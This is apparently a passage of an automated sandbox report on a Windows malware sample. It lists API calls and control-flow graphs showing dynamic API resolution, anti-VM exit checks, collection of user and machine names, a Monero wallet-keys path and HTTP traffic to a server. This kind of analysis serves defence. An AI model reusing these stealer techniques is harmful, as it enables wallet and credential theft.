                                • LoadLibraryA.KERNEL32(01BFDF10,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA382
                                • LoadLibraryA.KERNEL32(01BFDF28,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA393
                                • LoadLibraryA.KERNEL32(01BFDFB8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3A5
                                • LoadLibraryA.KERNEL32(01BFDF40,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3B7
                                • LoadLibraryA.KERNEL32(01BFDFE8,?,00EB5EF3,00EC0AEB,?,?,?,?,?,?,?,?,?,?,00EC0AEA,00EC0AE7), ref: 00EBA3C8
                                • GetProcAddress.KERNEL32(75290000,01BE57D0), ref: 00EBA3EA
                                • GetProcAddress.KERNEL32(75290000,01BFE180), ref: 00EBA402
                                • GetProcAddress.KERNEL32(75290000,01BF9E08), ref: 00EBA41A
                                • GetProcAddress.KERNEL32(75290000,01BFE150), ref: 00EBA433
                                • GetProcAddress.KERNEL32(75290000,01BE57F0), ref: 00EBA44B
                                • GetProcAddress.KERNEL32(73B50000,01BECAE0), ref: 00EBA470
                                • GetProcAddress.KERNEL32(73B50000,01BE56F0), ref: 00EBA489
                                • GetProcAddress.KERNEL32(73B50000,01BEC9F0), ref: 00EBA4A1
                                • GetProcAddress.KERNEL32(73B50000,01BFE270), ref: 00EBA4B9
                                • GetProcAddress.KERNEL32(73B50000,01BFE1E0), ref: 00EBA4D2
                                • GetProcAddress.KERNEL32(73B50000,01BE56D0), ref: 00EBA4EA
                                • GetProcAddress.KERNEL32(73B50000,01BE59F0), ref: 00EBA502
                                • GetProcAddress.KERNEL32(73B50000,01BFE090), ref: 00EBA51B
                                • GetProcAddress.KERNEL32(752C0000,01BE5930), ref: 00EBA53C
                                • GetProcAddress.KERNEL32(752C0000,01BE5730), ref: 00EBA554
                                • GetProcAddress.KERNEL32(752C0000,01BFE2B8), ref: 00EBA56D
                                • GetProcAddress.KERNEL32(752C0000,01BFE2A0), ref: 00EBA585
                                • GetProcAddress.KERNEL32(752C0000,01BE5910), ref: 00EBA59D
                                • GetProcAddress.KERNEL32(74EC0000,01BEC770), ref: 00EBA5C3
                                • GetProcAddress.KERNEL32(74EC0000,01BEC608), ref: 00EBA5DB
                                • GetProcAddress.KERNEL32(74EC0000,01BFE240), ref: 00EBA5F3
                                • GetProcAddress.KERNEL32(74EC0000,01BE59D0), ref: 00EBA60C
                                • GetProcAddress.KERNEL32(74EC0000,01BE5850), ref: 00EBA624
                                • GetProcAddress.KERNEL32(74EC0000,01BEC838), ref: 00EBA63C
                                • GetProcAddress.KERNEL32(75BD0000,01BFE258), ref: 00EBA662
                                • GetProcAddress.KERNEL32(75BD0000,01BE5A10), ref: 00EBA67A
                                • GetProcAddress.KERNEL32(75BD0000,01BF9E38), ref: 00EBA692
                                • GetProcAddress.KERNEL32(75BD0000,01BFE138), ref: 00EBA6AB
                                • GetProcAddress.KERNEL32(75BD0000,01BFE108), ref: 00EBA6C3
                                • GetProcAddress.KERNEL32(75BD0000,01BE5990), ref: 00EBA6DB
                                • GetProcAddress.KERNEL32(75BD0000,01BE5A30), ref: 00EBA6F4
                                • GetProcAddress.KERNEL32(75BD0000,01BFE168), ref: 00EBA70C
                                • GetProcAddress.KERNEL32(75BD0000,01BFE288), ref: 00EBA724
                                • GetProcAddress.KERNEL32(75A70000,01BE5890), ref: 00EBA746
                                • GetProcAddress.KERNEL32(75A70000,01BFE318), ref: 00EBA75E
                                • GetProcAddress.KERNEL32(75A70000,01BFE2E8), ref: 00EBA776
                                • GetProcAddress.KERNEL32(75A70000,01BFE198), ref: 00EBA78F
                                • GetProcAddress.KERNEL32(75A70000,01BFE120), ref: 00EBA7A7
                                • GetProcAddress.KERNEL32(75450000,01BE5710), ref: 00EBA7C8
                                • GetProcAddress.KERNEL32(75450000,01BE5770), ref: 00EBA7E1
                                • GetProcAddress.KERNEL32(75DA0000,01BE5750), ref: 00EBA802
                                • GetProcAddress.KERNEL32(75DA0000,01BFE360), ref: 00EBA81A
                                • GetProcAddress.KERNEL32(6F070000,01BE57B0), ref: 00EBA840
                                • GetProcAddress.KERNEL32(6F070000,01BE5870), ref: 00EBA858
                                • GetProcAddress.KERNEL32(6F070000,01BE5A50), ref: 00EBA870
                                • GetProcAddress.KERNEL32(6F070000,01BFE2D0), ref: 00EBA889
                                • GetProcAddress.KERNEL32(6F070000,01BE5810), ref: 00EBA8A1
                                • GetProcAddress.KERNEL32(6F070000,01BE58B0), ref: 00EBA8B9
                                • GetProcAddress.KERNEL32(6F070000,01BE59B0), ref: 00EBA8D2
                                • GetProcAddress.KERNEL32(6F070000,01BE5A70), ref: 00EBA8EA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00EBA901
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00EBA917
                                • GetProcAddress.KERNEL32(75AF0000,01BFE0A8), ref: 00EBA939
                                • GetProcAddress.KERNEL32(75AF0000,01BF9E18), ref: 00EBA951
                                • GetProcAddress.KERNEL32(75AF0000,01BFE300), ref: 00EBA969
                                • GetProcAddress.KERNEL32(75AF0000,01BFE330), ref: 00EBA982
                                • GetProcAddress.KERNEL32(75D90000,01BE5790), ref: 00EBA9A3
                                • GetProcAddress.KERNEL32(6E360000,01BFE348), ref: 00EBA9C4
                                • GetProcAddress.KERNEL32(6E360000,01BE5690), ref: 00EBA9DD
                                • GetProcAddress.KERNEL32(6E360000,01BFE1B0), ref: 00EBA9F5
                                • GetProcAddress.KERNEL32(6E360000,01BFE1C8), ref: 00EBAA0D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: c8259cbf2507db9264ffa103abfefabc32109d76d99a4cff504325d03e9ca6e4
                                • Instruction ID: 503ff1e3970c5ee650272bb2e15ba1dd664f8ce6113b461f6f9eb196c656a95b
                                • Opcode Fuzzy Hash: c8259cbf2507db9264ffa103abfefabc32109d76d99a4cff504325d03e9ca6e4
                                • Instruction Fuzzy Hash: 5C621CB56106009FD36CDFA8F98C9567BBAA74D701B10893AF939C3398DA7599C0CF60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 ea48d0-ea4992 call ebaab0 call ea4800 call ebaa50 * 5 InternetOpenA StrCmpCA 816 ea499b-ea499f 801->816 817 ea4994 801->817 818 ea4f1b-ea4f43 InternetCloseHandle call ebade0 call eaa210 816->818 819 ea49a5-ea4b1d call eb8cf0 call ebac30 call ebabb0 call ebab10 * 2 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebac30 call ebabb0 call ebab10 * 2 InternetConnectA 816->819 817->816 829 ea4f82-ea4ff2 call eb8b20 * 2 call ebaab0 call ebab10 * 8 818->829 830 ea4f45-ea4f7d call ebab30 call ebacc0 call ebabb0 call ebab10 818->830 819->818 905 ea4b23-ea4b27 819->905 830->829 906 ea4b29-ea4b33 905->906 907 ea4b35 905->907 908 ea4b3f-ea4b72 HttpOpenRequestA 906->908 907->908 909 ea4b78-ea4e78 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebacc0 call ebabb0 call ebab10 call ebac30 call ebabb0 call ebab10 call ebaa50 call ebac30 * 2 call ebabb0 call ebab10 * 2 call ebade0 lstrlen call ebade0 * 2 lstrlen call ebade0 HttpSendRequestA 908->909 910 ea4f0e-ea4f15 InternetCloseHandle 908->910 1021 ea4e82-ea4eac InternetReadFile 909->1021 910->818 1022 ea4eae-ea4eb5 1021->1022 1023 ea4eb7-ea4f09 InternetCloseHandle call ebab10 1021->1023 1022->1023 1024 ea4eb9-ea4ef7 call ebacc0 call ebabb0 call ebab10 1022->1024 1023->910 1024->1021
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EA4965
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA498A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EA4B0A
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EC0DDE,00000000,?,?,00000000,?,",00000000,?,01BFF820), ref: 00EA4E38
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EA4E54
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EA4E68
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EA4E99
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4EFD
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4F15
                                • HttpOpenRequestA.WININET(00000000,01BFF830,?,01BFF220,00000000,00000000,00400100,00000000), ref: 00EA4B65
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • InternetCloseHandle.WININET(00000000), ref: 00EA4F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: 230775f955b93faf048fb851b44ea4e3215a783552858ed05a60c7de890d3135
                                • Instruction ID: 486a9d290572015088fe8fda3052e1b095af7bb7e8268d38411e4274402d7087
                                • Opcode Fuzzy Hash: 230775f955b93faf048fb851b44ea4e3215a783552858ed05a60c7de890d3135
                                • Instruction Fuzzy Hash: 3412E972910218AACF14EB90DDA2FEEB7B9AF14300F5455B9F11672191EF702B48CF61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 eb5760-eb57c7 call eb5d20 call ebab30 * 3 call ebaa50 * 4 1106 eb57cc-eb57d3 1090->1106 1107 eb5827-eb589c call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1106->1107 1108 eb57d5-eb5806 call ebab30 call ebaab0 call ea1590 call eb5440 1106->1108 1133 eb58e3-eb58f9 call ebade0 StrCmpCA 1107->1133 1138 eb589e-eb58de call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1107->1138 1124 eb580b-eb5822 call ebabb0 call ebab10 1108->1124 1124->1133 1140 eb58ff-eb5906 1133->1140 1141 eb5a2c-eb5a94 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1133->1141 1138->1133 1144 eb5a2a-eb5aaf call ebade0 StrCmpCA 1140->1144 1145 eb590c-eb5913 1140->1145 1270 eb5d13-eb5d16 1141->1270 1164 eb5be1-eb5c49 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1144->1164 1165 eb5ab5-eb5abc 1144->1165 1149 eb596e-eb59e3 call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1145->1149 1150 eb5915-eb5969 call ebab30 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1145->1150 1149->1144 1250 eb59e5-eb5a25 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1149->1250 1150->1144 1164->1270 1171 eb5bdf-eb5c64 call ebade0 StrCmpCA 1165->1171 1172 eb5ac2-eb5ac9 1165->1172 1201 eb5c78-eb5ce1 call ebabb0 call ebab30 * 2 call ea16b0 call ebab10 * 4 call ea1670 call ea1550 1171->1201 1202 eb5c66-eb5c71 Sleep 1171->1202 1180 eb5acb-eb5b1e call ebab30 call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1172->1180 1181 eb5b23-eb5b98 call ebaa50 * 2 call ea1590 call eb5510 call ebabb0 call ebab10 call ebade0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 eb5b9a-eb5bda call ebaab0 call ea1590 call eb5440 call ebabb0 call ebab10 1181->1275 1201->1270 1202->1106 1250->1144 1275->1171
                                APIs
                                  • Part of subcall function 00EBAB30: lstrlen.KERNEL32(UO,?,?,00EA4F55,00EC0DDF), ref: 00EBAB3B
                                  • Part of subcall function 00EBAB30: lstrcpy.KERNEL32(00EC0DDF,00000000), ref: 00EBAB95
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5894
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB58F1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5AA7
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EB5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5478
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5568
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB557F
                                  • Part of subcall function 00EB5510: StrStrA.SHLWAPI(00000000,00000000), ref: 00EB55B4
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB55D3
                                  • Part of subcall function 00EB5510: lstrlen.KERNEL32(00000000), ref: 00EB55FE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB59DB
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EB5B90
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EB5C5C
                                • Sleep.KERNEL32(0000EA60), ref: 00EB5C6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 8599ea7f0d2c642b5800536f6b4adb774e3e36a82f3d4d471885a44fd19c5452
                                • Instruction ID: 0317a53deb376d45f72524f163fd022433198ed00318d50f4eb39e233cc66911
                                • Opcode Fuzzy Hash: 8599ea7f0d2c642b5800536f6b4adb774e3e36a82f3d4d471885a44fd19c5452
                                • Instruction Fuzzy Hash: AEE14272910104AACF18FBA0D9A3EEF73BDAF54300F449578B52676195EF316B48CB62

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 eb19f0-eb1a1d call ebade0 StrCmpCA 1304 eb1a1f-eb1a21 ExitProcess 1301->1304 1305 eb1a27-eb1a41 call ebade0 1301->1305 1309 eb1a44-eb1a48 1305->1309 1310 eb1a4e-eb1a61 1309->1310 1311 eb1c12-eb1c1d call ebab10 1309->1311 1313 eb1bee-eb1c0d 1310->1313 1314 eb1a67-eb1a6a 1310->1314 1313->1309 1316 eb1acf-eb1ae0 StrCmpCA 1314->1316 1317 eb1aad-eb1abe StrCmpCA 1314->1317 1318 eb1b63-eb1b74 StrCmpCA 1314->1318 1319 eb1b82-eb1b93 StrCmpCA 1314->1319 1320 eb1b41-eb1b52 StrCmpCA 1314->1320 1321 eb1ba1-eb1bb2 StrCmpCA 1314->1321 1322 eb1bc0-eb1bd1 StrCmpCA 1314->1322 1323 eb1a85-eb1a94 call ebab30 1314->1323 1324 eb1a99-eb1aa8 call ebab30 1314->1324 1325 eb1b1f-eb1b30 StrCmpCA 1314->1325 1326 eb1bdf-eb1be9 call ebab30 1314->1326 1327 eb1afd-eb1b0e StrCmpCA 1314->1327 1328 eb1a71-eb1a80 call ebab30 1314->1328 1344 eb1aee-eb1af1 1316->1344 1345 eb1ae2-eb1aec 1316->1345 1342 eb1aca 1317->1342 1343 eb1ac0-eb1ac3 1317->1343 1329 eb1b80 1318->1329 1330 eb1b76-eb1b79 1318->1330 1331 eb1b9f 1319->1331 1332 eb1b95-eb1b98 1319->1332 1350 eb1b5e 1320->1350 1351 eb1b54-eb1b57 1320->1351 1333 eb1bbe 1321->1333 1334 eb1bb4-eb1bb7 1321->1334 1336 eb1bdd 1322->1336 1337 eb1bd3-eb1bd6 1322->1337 1323->1313 1324->1313 1348 eb1b3c 1325->1348 1349 eb1b32-eb1b35 1325->1349 1326->1313 1346 eb1b1a 1327->1346 1347 eb1b10-eb1b13 1327->1347 1328->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 eb1af8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00EB1A15
                                • ExitProcess.KERNEL32 ref: 00EB1A21
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: c34a390b3b1219cbecb1786f9ffc53ed1f7cd4d5f963ba0e11897371d3bdfe8f
                                • Instruction ID: 9fe50e5deec89e2dcae5f2222c13ee9e5fda9e151b828515f86d27aee20d91e2
                                • Opcode Fuzzy Hash: c34a390b3b1219cbecb1786f9ffc53ed1f7cd4d5f963ba0e11897371d3bdfe8f
                                • Instruction Fuzzy Hash: AC513C75A04209EBCB14DF94DAA4FEF77B9EF44714F5054A8E812BB280E770EA41CB51

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3150), ref: 00EB9BF1
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF31E0), ref: 00EB9C0A
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3000), ref: 00EB9C22
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF30F0), ref: 00EB9C3A
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF30A8), ref: 00EB9C53
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF9E28), ref: 00EB9C6B
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5BB0), ref: 00EB9C83
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5B70), ref: 00EB9C9C
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3048), ref: 00EB9CB4
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3108), ref: 00EB9CCC
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3018), ref: 00EB9CE5
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3030), ref: 00EB9CFD
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BE5AD0), ref: 00EB9D15
                                  • Part of subcall function 00EB9BB0: GetProcAddress.KERNEL32(74DD0000,01BF3240), ref: 00EB9D2E
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EA11D0: ExitProcess.KERNEL32 ref: 00EA1211
                                  • Part of subcall function 00EA1160: GetSystemInfo.KERNEL32(?), ref: 00EA116A
                                  • Part of subcall function 00EA1160: ExitProcess.KERNEL32 ref: 00EA117E
                                  • Part of subcall function 00EA1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EA112B
                                  • Part of subcall function 00EA1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00EA1132
                                  • Part of subcall function 00EA1110: ExitProcess.KERNEL32 ref: 00EA1143
                                  • Part of subcall function 00EA1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EA123E
                                  • Part of subcall function 00EA1220: ExitProcess.KERNEL32 ref: 00EA1294
                                  • Part of subcall function 00EB6A10: GetUserDefaultLangID.KERNEL32 ref: 00EB6A14
                                  • Part of subcall function 00EA1190: ExitProcess.KERNEL32 ref: 00EA11C6
                                  • Part of subcall function 00EB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EA11B7), ref: 00EB7A10
                                  • Part of subcall function 00EB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7A17
                                  • Part of subcall function 00EB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EB7A2F
                                  • Part of subcall function 00EB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7AA0
                                  • Part of subcall function 00EB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00EB7AA7
                                  • Part of subcall function 00EB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00EB7ABF
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
